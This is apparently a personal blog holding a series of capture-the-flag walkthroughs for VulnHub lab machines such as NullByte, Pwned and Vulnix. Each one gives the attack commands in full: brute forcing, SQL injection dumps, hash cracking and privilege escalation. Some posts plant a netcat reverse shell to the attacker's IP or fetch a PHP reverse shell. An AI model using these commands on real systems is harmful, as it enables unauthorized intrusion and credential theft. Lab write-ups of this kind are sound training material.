Tag: tcert

This is NullByte from vulhub
Overview:
```
Target Machine IP Address: 192.168.56.122  
My Machine IP Address: 192.168.56.117
```
Mission:
```
Boot to Root

Get to /root/proof.txt and follow the instructions.

Level: Basic to intermediate.

Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.

Hints: Use your lateral thinking skills, maybe you’ll need to write some code.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth1 192.168.56.1/24
```
```
nmap -sC -sV -p- -Pn 192.168.56.122 -o nmap.log
```
```
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 32979/udp6 status
| 100024 1 42801/udp status
| 100024 1 48014/tcp status
|_ 100024 1 60755/tcp6 status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
| 1024 163013d9d55536e81bb7d9ba552fd744 (DSA)
| 2048 29aa7d2e608ba6a1c2bd7cc8bd3cf4f2 (RSA)
| 256 6006e3648f8a6fa7745a8b3fe1249396 (ECDSA)
|_ 256 bcf7448d796a194876a3e24492dc13a2 (ED25519)
48014/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Let’s visit the IP address as it is running the Apache web server.

No robots.txt, nothing is hidden in the source code. Downloaded the image and checked its metadata using Exiftool. Found nothing important.
```
wget http://192.168.56.122/main.gif

exiftool main.gif
```
Let’s check whether any directories or files are in the web server (apart from the index page).
```
gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
```
I mentioned in my previous walkthroughs that I will be using dirsearch (along with gobuster) with common.txt, to be on the safe side 😉
```
dirsearch -u http://192.168.56.122 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f
```
There are a couple of directories we found, which are javascript, phpmyadmin, and uploads.

However, the bad news is that; apart from phpmyadmin, both of the folders were protected.

To be honest, at this point, I ran out of ideas or leads on what should I do (I feel a little exhausted because I haven’t slept well as there was construction going on near my place and their sight emits an intense light throughout the night which literally makes my room has no difference between the day or night. I am going to find a solution for that, like covering the window blinds with some bed sheets). Anyway, I know that this machine is not a new one, so I quickly sneaked into other people’s walkthrough.

I had to redo perform the exiftool on the image file that we downloaded earlier.

Yes, we got a string. Initially, I thought it might be the password because we know that the machine has SSH running. And in the past, I remember, I did a machine and I got the password, but I was not able to find the username, and the username was actually the machine name. Therefore, I used nullbyte as the username and kzMb5nVYJw as the password (this time with a little hope). However, it was not the case. I tried to identify whether it is some kind of hash or encoded message. With my limited exposure, I was not able to do anything. Yes, I had to sneak again. Oh man! It is just a name of a directory (who would think that but yeah, I need to keep these things in my mind so that I won’t have to fall on my nose again later when a similar situation arises)

You might not believe that I have tried all the tricks I know to get the pin number however, all effort went in vain. (I increased my VM to 16 gigs and gave burp 8 gigs and ran the intruder with rockyou.txt payload for one entire night. It was running but I get a sense that this is not the intended way to solve it. Of course, if you were doing it professionally then you have to stick with your own methodology.) A few years back, I have a friend who bruteforce an Android TV locked with pin using Hydra. So I think I could try that too.

Yes, I got the logic but my syntax was not correct. Out of separation, I asked ChatGPT to fix the syntax. My gosh, it is just because of a minor quotation mark that messed up my script. Anyway, here is the working syntax.
```
hydra -s 80 192.168.56.122 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /usr/share/wordlists/rockyou.txt -la | tee nullbyte.hydra
```
After entering the PIN code, we got another input type box. Based on the prompt, it looks like there is a database running behind the application. Here are the screenshots.

When I enter 1 in the Enter username: Input Box of the webpage, the URL gets changed and I am able to inject or insert value into the database. Therefore, I am going to use this URL on SQLMap. (Remember, I remember a couple of hours to solve previous boxes and during that, I took a good amount of notes on how to use sqlmap. It pays now 😉 )
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1
```
Note: Yes, it works and informed me (in a bold letter) that it is injectable and that it is running MYSQL database.

Then I try to enumerate to know the name of the database.
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs
```
Now, I need to know the table name, column name, and the data within it.
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --tables 
```
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user --columns 
```
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user -C user --dump 
```
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user -C pass --dump 
```
Just to get myself the hang of knowledge, I follow it stepwise. Otherwise, if you are playing some kind of CTF (especially when time is not in your favor, I think you could directly dump the table).
```
sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T users --dump
```
Database: seth
user: isis
pass: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
```
echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
```
We get this string

c6d6bd7ebf806f43c76acc3681703b81base64: And I need to do a little cleaning there (I must confess it took a while for me to notice it). I have to remove “base64:” from the above string.

c6d6bd7ebf806f43c76acc3681703b81

I tried hash_id first and it somewhat gives me a hunch that it is md5 hash. However, when I ran hash-identifier. It helped me to confirm that the string is indeed md5 hash.

So to break md5hash, I know two ways, here is it…
```
hashcat -m 0 'c6d6bd7ebf806f43c76acc3681703b81' /usr/share/wordlists/rockyou.txt
```
Output:

omega

An alternate method is to use crackstation.net to do the md5 hash crack for you.

We got an Initial foot-hold!

I ran a command
```
ls  -lR /home
```
Come to know there is user with home folder: bob, eric and ramses

Based on my previous experience playing with boxes, I need to manually check everywhere where I think usually the useful files are located and if I ran out of options, then we could leverage the power of linpeas.sh 🙂

Initially, I thought I could find a user flag, but it looks like this box doesn’t contain any user flag because I search the entire box using the following command
```
find / -type f -name user.txt 2>/dev/null
```
Not necessary

Rabbit holes:

I checked the kernel version and tried with the dirty cow exploit. To be candid, I think we could pwn the machine through kernel exploit but we must need to invest more time, so let’s not delve too much because my plate is rather full at this moment.

By the way, I tried this exploit.

Another Rabbit hole:

Then while I was checking here and there, I got the MySQL root password.

I wasn’t able to find anything useful and, I checked the version of MYSQL. It was running quite an old version, thought I could get something out of it. My hopes were pretty high. But it wasn’t that helpful. By the way, I tried this exploit.

Main Findings:

Then, I found (which means I spent quite some time looking here and there lol) a backup folder. A procwatch binary is running with root privilege. Based on the output, we can’t make it out that is listing the process running on the machine, exactly like ps command.

We will use the path redirection to escalate the privilege.
```
echo "/bin/sh"  >  ps
chmod +x ps
```
add the location (path) of the procwatch
```
export PATH="/var/www/backup:$PATH"


./procwatch

id
```
We got the root!

Finally done with null byte. However, I am going to redo this machine later on because I want to try manual sql injection because for OSCP we can’t use the sqlmap tool. It’s 5:07PM and I am finally going to have lunch now lol

Referred link:
– https://linuxize.com/post/how-to-add-directory-to-path-in-linux/
May 22, 2023
rooting cybersploit 2 machine ?
Overview:
```
Target Machine IP Address: 192.168.56.41
My Machine IP Address: 192.168.56.20
```
Mission:

Boot to Root
```
Your target is gain the Root access

There is no any flag in this VMs

Share root access with me twitter@cybersploit1

This works better with VirtualBox rather than VMware
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- 192.168.56.41 -o nmap.log
```
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
```
Let’s browse 192.168.56.41

Some strings are encrypted. Let’s check out the source code. (ctrl+u shortcut key)

Yes, this is a ROT47 encrypted message, I thought to write a script to do this however, let’s not waste time. Better google an online tool for this task. I used this one.
```
username: D92:=6?5C2 -> shailendra
password: 4J36CDA=@:E-> cybersploit1
```
Since the target machine is running SSH service, let’s try that.
```
ssh shailendra@192.168.56.41
```
ls -lah

We got a hint.txt

The system is running docker.

Remember always, this will be our black book of magic (gtfobins.github.io/)
```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh 
```
However, in order to run this command, you need to provide the internet (at least in my case), else you might not able to download alpine/latest.

Finally, cybersploit2 is pwned!!
July 23, 2020
Shelling Decoy
Overview:
```
Target Machine IP Address: 192.168.56.42
My Machine IP Address: 192.168.56.20
```
Mission:
```
THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- 192.168.56.42 -o nmap.log
```
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
```
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdfThe zip file required a password to access it. I am not able to find anything which could be leveraged to use as password. Let’s crack it through brute force using rockyou.txt with fcrackzip tool.
```
 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 
```
```
password: manuelhttps://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
```
We were able to get some juicy information and I am not going to write here each file, however, I am sure you know well that shadow file is the hashed form of the password for the users. I think this may be enough.

We need to break the hash, so let’s use john for the task and take necessary hashes and make it in one form.

username: 296640a3b825115a47b68fc44501c828
```
echo "$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us." | > ../hash.txt
```
```
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42
```
password: server

We need to bypass the rbash restriction. I have never used it however, I have seen this in blog and youtube vidoes by IPPSec.

If you want to know more about rbash bypass, you can read it from here.

From that pdf resources, I tried all the commands and it didn’t work. However, as I tried the following Advance Techniques part, it no longer gives me
```
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"
```
Now we can see that it no longer showing us rbash restriction rather command not found which means, the binary or the command path needs to be fixed here.

What I tried was I echo the PATH of my Kali Machine and copied this path and set it to the target machine. Perhaps you might understand it better if you see this screenshot.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

Ok, let’s download pspy on Kali Machine and they transfer that to out targetted machine. I use SimpleHTTPServer to do the work, of course, you can have your own method 🙂

Let’s do a searchexploit chkrootkit or search chkrootkit on google (it will show exploit-db which is GUI of searchsploit).

When we read the exploit steps (like how to configure and how to use it), it tells us this..

The steps are quite self-explanatory, however, what I did here is, I checked the location of the NC program in the target box and then let it run /bin/sh with port 1234, to reverse a connection to IP address 192.168.56.33 (My Kali Machine). Of course, as per the instruction we need to give execution permission to out executable file

Note: I checked the cron entry and I was not able to find any relevant information that whether update (which we have created) is running nor I found chkrootkit related. Interestingly when I check the process through pspy64, periodically /tmp/update is running. Therefore, we can leverage that to our purpose. By the way, this might be because when we run this program honeypot.decoy, it triggers the chkrootkit.

Exploit 1:
```
#!/bin/bash
echo 'root:tcert.net' | sudo chpasswd

save it as update (by the way, you have to use nano editor this time because if I am not wrong vi editor is not available)

chmod +s update  (I sipped tea and look around) and then 

su - root 

password: tcert.net 
```
Exploit 2: (It didn’t work for me. I need to dig little deeper)
```
echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
chmod +x update
```
That’s all guys 🙂
July 23, 2020

Let’s pwn cybersploit machine

Overview:

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.40 -o nmap.log

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

username:itsskv

cybersploit

CyBeRSplOiT

I ran nikto but didn’t get information but gobuster did give me something..

gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

http://192.168.56.40/robots.txt

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

Let’s decrypt the string…

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

Flag1: cybersploit{youtube.com/c/cybersploit}

By the way, you might be wondering what is at http://192.168.56.40/hacker (it was just a gif).

Ok since, we got the username: itsskv

And password: cybersploit{youtube.com/c/cybersploit}

And the box is running ssh, how about we try that first?

ssh itsskv@192.168.56.40

ls -lah

cat flag2.txt

I used this website to decrypt. https://cryptii.com/pipes/binary-to-english

good work !
flag2: cybersploit{https:t.me/cybersploit1}

uname -a

3.13.0-32-generic

Google 3.13.0-32-generic exploit searchsploit didn’t work for me (I will figure this out later)

https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

That’s it guys! Going to have breakfast now … little hungry lol

Wish you a productive day!!

July 22, 2020

Let’s take down victim01
Overview:
```
Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- -o nmap.log 192.168.56.38
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

8080/tcp open http BusyBox httpd 1.13

8999/tcp open http WebFS httpd 1.21

9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
```
http://192.168.56.38:8999
```
Let’s download WPA-01.cap

Let’s run the packet in wireshark
```
wireshark WPA-01.cap &
```
I tried my best to dive into the cap file, I was not able to get any anything concrete. Based on our previous machine that we did, I am having a hunch that we will get a username and a password out of this.

Although it shows many connected devices to the router (dlink), only dlink did work as a username. You might be wondering how I got the password? You might know if you have read this post.

Yeah I did run aircrack-ng on the CAP file with rockyou file.
```
aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt
```
Yes, the password is p4ssword
```
ssh dlink@192.168.56.38        password: p4ssword
```
I made it a habit that as soon as I get a limited (or user shell), I do manually check all the low hanging fruits.

Such as

sudo -l

cat ~/.viminfo

crontab -l

history

find / -perm -u=s -type f 2>/dev/null

find / -perm 0777 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

to name a few. If I don’t find anything then I use linpeas.sh and other scripts, by uploading those to /tmp folder of that limited user account.

We found something interesting.
```
https://gtfobins.github.io/gtfobins/nohup/
```
Note: kindly bookmark this website site. https://gtfobins.github.io/
```
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
```
yeah, we got the flag..

Method 2:

To check writeable directory
```
find / -writable -type d 2>/dev/null 
```
```
/var/www/bolt/public/files  it has the 777 permissions
```
If you have carefully read the output from nmap, you might have seen that the server is running PHP cli server. That means we can upload a php reverse shell.

Let’s do that..

On Kali Machine

I have downloaded and stored my shells and other tools at /opt

python -m SimpleHTTPServer 8000

On Victim01 Machine

cd /var/www/bolt/public/files/

wget 192.168.56.33:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

And also change the IP address and Port of your choice. Mine IP: 192.168.56.33 Port:1234

Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.

I tried to execute the PHP shell on the victim machine to get the reverse connection and I get a limited shell. However, when I try to view the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know what is the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while I do shelling other boxes in the future.

yes, another way to get root!

That’s all guys 🙂
July 21, 2020
Pwning Pwned
Overview:
```
Pwned Machine IP Address: 192.168.56.37
My Machine IP Address: 192.168.56.20
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
Download:
```
You can download the machine from here.
```
************************************

To know the IP address of the Target Machine:
```
 sudo arp-scan --interface=vboxnet0 192.168.56.1/24
```
Scanning:
```
nmap -sC -sV  -p- 192.168.56.37 -o nmap.log
```
Output:
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
```
Let’s get a glimpse of the website first because the machine is running an apache web server.

Attacker name:
```
Annlynn
```
After the attacker’s name, I didn’t get any. So, usually, I like to check robots.txt

http://192.168.56.37/robots.txt

It redirects to some files and I won’t go through it here because it was a rabbit hole.

I did run Nikto scanner and got a little information but it was nothing special, as it just gave me things which I got earlier. (The folder called nothing. That’s all)

Gobuster Scanner:
```
dir -u 192.168.56.37 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster.log
```
We got a new file, called hidden_text. This experience taught me an important lesson, i.e. never depend on a single tool for everything.
```
http://192.168.56.37/hidden_text/
```
I tried every parameter and, I thought to automate the process either through Burp Suite or a shell command. Perhaps, after this task is over, I will write a script to automate this task for us.
```
http://192.168.56.37/pwned.vuln/
```
View source code:
```
ftpuser' && $pw=='B0ss_B!TcH'
```
Exploitation:

Well, credential didn’t work with about login panel, so let us try with FTP (we know the machine is running FTP through Nmap scan.)

Yes, I was able to log into the machine by using the above credentials

However, I think it is important to pass -a as argument along with the command dir -a. Because although I was not able to see anything despite the command executed successfully.

I found two files in there. It looks like important because one file is an ssh key and other note content username. Probably we could get access by using this information.

username: ariana

password: ssh private key

Remember before using an SSH key, set the permission to either 400 or 600. (usually, I like 400 on production and 600 when I am trying something like a pwning machine).
```
chmod 600 id_rsa
```
```
ssh ariana@192.168.56.37 -i id_rsa
```
Yes, we got a shell here. Usually, as soon as I get a shell, I like to try some low hanging fruits first. Like what is shown in the screenshot.

So far we got this information:

User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
```
cat /home/messenger.sh  (make a mental note)
```
```
congratulations you Pwned ariana

Here is your user flag _______

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root
```
To be honest, I am yet to have breakfast and thought to grasp some but because of this flag, I am gonna stick with the machine sometimes more.

I found a diary called ariana-personal.diary

It was written

It’s Ariana personal Diary :::

Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

I didn’t get anything special, so how about we run the script that we got from above? /home/messenger.sh
```
sudo -u selena /home/messenger.sh
```
I struggled a little here and need to have a peek on other people’s walkthrough (it is here.)

yes, it is perfect time to get an interactive shell.
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
```
id 

docker images 

docker run -v /:/mnt --rm -it privesc chroot /mnt sh
```
I got root here, however, I was not happy because I don’t know what this script (docker run -v /:/mnt –rm -it privesc chroot /mnt sh) does. So gonna do little research after breakfast…

Wish you all a productive day!!

Some Rabbit holes while I was digging the account of ariana.

Other things, what I did

I thought to find some SUID and SGID file manually, however, since I have linpeas.sh on my Kali Machine (192.168.56.33). So I am going to upload the shell from there to the target machine. That way, it will do everything automatically.

chmod +x linpeas.sh (on target machine /tmp folder)

While I was going through the extensive report from the linpeas.sh, I can definitely conclude that the machine is running an outdated docker container.
```
ps aux | grep "docker"
```
1. Result excerpt from linpeas.sh

2. Result excerpt from linpeas.sh
July 19, 2020
Will I get a root access to PumpkinRaising Machine ?
Overview:
```
Pumpkin Raising Machine IP Address: 192.168.56.17
My Machine IP Address: 192.168.56.1
```
Mission:
```
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.
```
Step 01:
```
nmap -sC -sV -p- 192.168.56.17 -oN nmap.log
```
Output:
```
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
Nmap scan report for 192.168.56.17

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd
| http-robots.txt: 23 disallowed entries (15 shown)
| /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
| /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
| /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
|_/filter/tips/
|_http-server-header: Apache
|_http-title: Mission-Pumpkin
```
Step 02:

Actually, nmap is revealing enough information to go through however, let me stick with my methodology.

Since it is clearly running a web server on port 80. Let’s visit the website and check their source code first.

When I see there is an images folder. I was little excited because we got a beautiful tip in previous box. (It is here)

Ops!

Step 03:

You can also see that there is a base64 encoded message in the source code.

I thought this may reveal a big secret like it did in my previous pumpkin box. However, it just turned to be a little troll 🙂

As I was going through the source code, I see a link to pumpkin.html

I took down name of the characters in my note, perhaps I could use that for some bruteforce purpose because we know that the machine is running ssh on port 22 (through nmap scanning).

In the source code, there is another encoded string, which is turn out to be base32. (I did some reading on base32 and tried myself to ensure that this string is base32).

besides, if you scroll down to bottom, you will see there is some hex string with it.

For time being, I save those hex to a file called hex.txt and keep it here for sometime, because we need to decode that base32 string.

I did download that pcap file and tried to trace it in wireshark

1)

2)

Follow the TCP Stream

3)

4)

Based on figure 3 and 4, we can conclude that we got another seed. Do you see that?

If not, see it closely..

5.

6.

To be honest, I didn’t see it at first, so what I did was, I know the SEED ID is 50609.

So, I did run a string command and everything become very clear.

See here
```
strings spy.pcap
```
Hence we got a Jack-Be-Little Pumpkin seeds ID: 50609

Step 04:

Don’t forget that we have an encoded hex string which need to be decoded. Here we go
```
cat hex.txt | xxd -p -r
```
Acorn Pumpkin Seeds ID: 96454

Step 05:

Let’s check the presence of robots.txt file

Output:
```
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images

# Directories
Disallow: /includes/
Disallow: /scripts/
Disallow: /js/
Disallow: /secrets/
Disallow: /css/
Disallow: /themes/

#Images
Allow: /images/*.gif
Allow: /images/*.jpg

# Files
Disallow: /CHANGELOG.txt
Disallow: /underconstruction.html
Disallow: /info.php
Disallow: /hidden/note.txt
Disallow: /INSTALL.mysql.txt
Disallow: /seeds/seed.txt.gpg
Disallow: /js/hidden.js


# Paths (clean URLs)
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /scripts/pcap
Disallow: /node/add/
Disallow: /security/gettips/
Disallow: /search/hidden/
Disallow: /user/addme/
Disallow: /user/donotopen/
Disallow: /user/
Disallow: /user/settings/
```
I must admit that when I see this exhaustive list, I was extremely excited however, out of all, only those bold colored where actually working (or revealing information that is of my interest).

Step 04:

While I was going through the folders (enshrined in the robots.txt), I found this interesting information .
```
Robert : C@43r0VqG2=
Mark : Qn@F5zMg4T
goblin : 79675-06172-65206-17765
```
I thought it might be some SSH credentials (as you can see from the nmap result that ssh is running). However, it didn’t work. So I make a note of it and proceed with my enumeration.

Step 05:

I found another intriguing information at 192.168.56.101/seeds/seed.txt.gpg , see here. This file is encrypted with gpg

subsequently, I did download the seed.txt.gpg googled the syntax to decrypt a pgp file.
```
Syntax: 
```
```
gpg --decrypt seed.txt.gpg 
```
```
I tried different passwords which you got from above enumeration

Password: SEEDWATERSUNLIGHT
```
Probably you might think, how this guy got the password SEEDWATERSUNLIGHT ? True, what I did was, I took down almost all words which I think could be password to a list and tried every one of them manually. (Following screenshot is my note)

By the way, I found this word from here. If you view the source code, you will know that the sign – is nothing but a space.

Do you see the space in source code? (Don’t look at the selected strings)

see my failed attempt lol

Finally I got this..

based on some google, I found that above pictorial representation is a mores code.

So, we had to decode. You can simple google, decode mores code online tool. There are many online tools and out of those, I love this the most. Here is the link. https://gchq.github.io/CyberChef/

It has many other features as well and all you have to do is search mores code and chose the option, From Mores Code option.

We got a SEED:

BIGMAXPUMPKIN SEEDS ID: 69507

I know little about stenography. After knowing that, I build a habit of myself to run exiftool, strings and stegosuite command to extract information out of any media files. Trust me it is very tedious task however, it does pay you sometime out of nowhere lol.

Having said that, one image really carried a text file with it.

I couldn’t recall the exact box, however, once I was pwning a box when I select all the website, certain message just shows there. Therefore, I did a Control+A and do you see what I see in this message ??

From this image and our previous knowledge on this box, we can expect that there is a gif file called jackolantern.gif under images, which deduced to

http://192.168.56.17/images/jackolantern.gif

Truly there is an image by that name and the way, how author has hide this image in a meticulous way, it definitely speaks out a lot.

Yes, after running stegosuite command with all the password. Finally we found something useful.

command:
```
stegosuite -x jackolantern.gif -k Qn@F5zMg4T

We were able to extract a text message called decorative.txt 

cat decorative.txt 
```
We got another SEED ID i.e.

Lil’ Pump-Ke-Mon Pumpkin seeds ID : 86568

I wish you to know that, it is not the result but I think we need to celebrate the process as well.. Like trying and enumerating everything that you could think of..

To attest what I am saying, I will enclosed one screenshot …:)

If we read carefully of those note written on the website, we got hint that we need to arrange the pumpkin seed id in order. And At that time, this screenshot helped me to order them.

Sequence of the respected pumpkin and their seedIDs:
```
First one is called "Big Max Pumpkin": 69507


Second: "Jack-be-little": 50609


third: "Acorn Pumpkin": 96454

forth: "Little Pump-ke-Mon": 86568
```
I have tried many combinations to login to ssh with different users and passwords that we got so far… Here is the note.

(many) failed attempts: (one example)

I found that following credential gives us a shell.
```
Username: jack
password: 69507506099645486568
```
Out of many rudimentary things like checking cron entries, SUID files, kernel etc. I check sudo user account ..
```
sudo -l
```
My favourite goldmine site: https://gtfobins.github.io/

Run the command

we got the root.. and the flag is here..

This box taught me many things and I am gonna revisit all the box I pwned again later.. just to evaluate did I really learn anything out of it 🙂

That’s all… Wish you all a very productive time 🙂
May 4, 2020
Vulnix walkthrough which bolstered my RHCSA knowledge
Hello everyone,

I hope you all are doing well. Today, I am going to do a a machine to enhance my penetration testing skills and guess what, the machine did test my knowledge on RHCSA (RHEL8). The machine was easy but you can’t say it is easy until you have certain knowledge on NFS share (Network File System Share). I was like “finally the training I attended in Bangalore come to use now lol”.

The machine name is called vulnix and you can easily get it from vulhub website. When I nmap (scan) the box, a huge list of running services were revealed and of course, you can enumerate each and every services (one by one), and that is actually a recommended way to learn or it is a way to get a better insight on the machine. This is actually I believe is how a professional pentester should approach to a machine. However, what I did was simply break the services into different categories and enumerate all the familiar services first.

Ok, let’s do the box.

As always my host Machine IP address is 192.168.56.1
```
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
```
Target Machine IP: 192.168.56.13
```
nmap -sC -sV -p- 192.168.56.13 -oN nmap.log 

-sC running default nmap default script 
-sV enumerating services and version of services 
-p- It represent to check all the 65535 ports 
-oN output
```
I did an extra step here, however it is not necessary for you. I just did this to show the readers that nfs version 2 to 4 is running. Therefore, we can exploit either 2 or 3. 4 is comparatively secure.

To get a peek, you can do the following command to know which folder is mounting.

To know a little about NFS:

click here and here.
```
showmount -e 192.168.56.13
```
```
sudo mount -o vers=3 192.168.56.13:/home/vulnix mnt
```
based on the output, we can be certain that there is a user named vulnix (/home/vulnix). Now, what we need to do is create this user with UID 2008.
```
sudo useradd --uid 2008 vulnix

sudo usermod -aG sudo vulnix
```
```
su vulnix 

cd /mnt 

mkdir .ssh 

ssh-keygen 
     
          ./id_rsa     (which means I would like have my keys saved in the current directory or /home/vulnix/mnt/.ssh, which is not the default path)
```
I divide the pane so that you can have the view of the both users (researcher and vulnix)

Since from nmap result, we know that the machine is running with SSH. Therefore and we can try to login to the remote machine with the SSH key which we generated previously on the target machine through nfs share.

To know little more of SSH and configuration, click here.
```
cat id_rsa.pub > authorized_keys

ssh -i id_rsa vulnix@192.168.56.13
```
```
sudo -l
```
```
sudoedit /etc/exports
```
add
```
 /root *(rw,no_root_squash)
```
No Root Squash (link)

